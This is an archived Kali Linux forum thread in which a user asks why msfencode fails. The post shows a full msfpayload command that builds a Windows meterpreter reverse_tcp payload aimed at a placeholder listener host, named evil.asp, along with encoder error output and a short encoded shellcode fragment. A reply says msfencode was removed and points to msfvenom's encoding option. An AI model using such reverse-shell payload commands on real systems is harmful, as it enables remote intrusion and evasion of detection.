PDA

View Full Version : Metasploit msfencode not working?



pamamolf
2015-09-08, 17:44
Hi

I am running from:


root@kali:/usr/share/framework2

the command:


./msfpayload windows/meterpreter/reverse_tcp LHOST=123.456.789.000 LPORT=1234 R | ./msfencode -o evil.asp

and i am getting this:


Msf::Encoder::PexFnstenvMov failed to return an encoded payload
Msf::Encoder::OSXPPCLongXORTag failed, doesn't support all architectures
Using Msf::Encoder::Countdown with final size of 20 bytes
"\x29\xc9\xb9\xff\xff\xff\xff\xe8\xff\xff\xff\xff\x c1\x5e\x30\x4c".
"\x0e\x07\xe2\xfa";

maskunderips
2015-09-27, 13:56
Hi

I am running from:


root@kali:/usr/share/framework2

the command:


./msfpayload windows/meterpreter/reverse_tcp LHOST=123.456.789.000 LPORT=1234 R | ./msfencode -o evil.asp

and i am getting this:


Msf::Encoder::PexFnstenvMov failed to return an encoded payload
Msf::Encoder::OSXPPCLongXORTag failed, doesn't support all architectures
Using Msf::Encoder::Countdown with final size of 20 bytes
"\x29\xc9\xb9\xff\xff\xff\xff\xe8\xff\xff\xff\xff\x c1\x5e\x30\x4c".
"\x0e\x07\xe2\xfa";


U cant use msfencode anymore. Cause deleted from metasploit. Try with msfvenom and -e (encode) parameter.